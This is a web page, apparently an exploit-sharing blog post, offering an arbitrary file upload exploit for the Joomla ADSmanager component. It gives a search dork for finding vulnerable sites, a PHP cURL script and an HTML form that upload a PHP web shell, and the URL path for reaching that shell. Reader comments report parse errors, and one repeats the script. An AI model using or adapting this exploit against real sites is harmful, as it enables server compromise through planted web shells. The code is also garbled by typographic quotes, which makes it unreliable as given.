Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability

Joomla_ADSmanager_Exploit

Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability

 

Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org
CODE PHP :
<?php
$url = “blabla.com/index.php?option=com_adsmanager&task=upload&tmpl=component”; // put URL Here
$post = array
(
“file” => “@shell.jpg”,
“name” => “shell.php”
);
$ch = curl_init ($url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, “Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0”);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
#CSRF :
<form method=”POST” action=”TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component”
enctype=”multipart/form-data”>
<input type=”file” name=”files[]” /><button>Upload</button>
</form>

Acces Shell: site.com/tmp/plupload/shell.php

Plz Share Share on FacebookShare on Google+Share on LinkedInTweet about this on TwitterEmail this to someoneShare on RedditShare on TumblrDigg thisBuffer this pagePrint this pagePin on PinterestShare on StumbleUponFlattr the author
Bookmark the permalink.

4 Comments

  1. dont working
    Parse error: syntax error, unexpected ‘:’ in 1.php on line 2

  2. PHP Parse error: syntax error, unexpected ‘:’ in /root/ss.php on line 3

  3. “@404.jpg”,
    “name” => “404.php”
    );
    $ch = curl_init (“$url”);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt ($ch, CURLOPT_USERAGENT, “Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0”);
    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt ($ch, CURLOPT_POST, 1);
    @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
    $data = curl_exec ($ch);
    curl_close ($ch);
    echo $data;
    ?>

Leave a Reply

Your email address will not be published. Required fields are marked *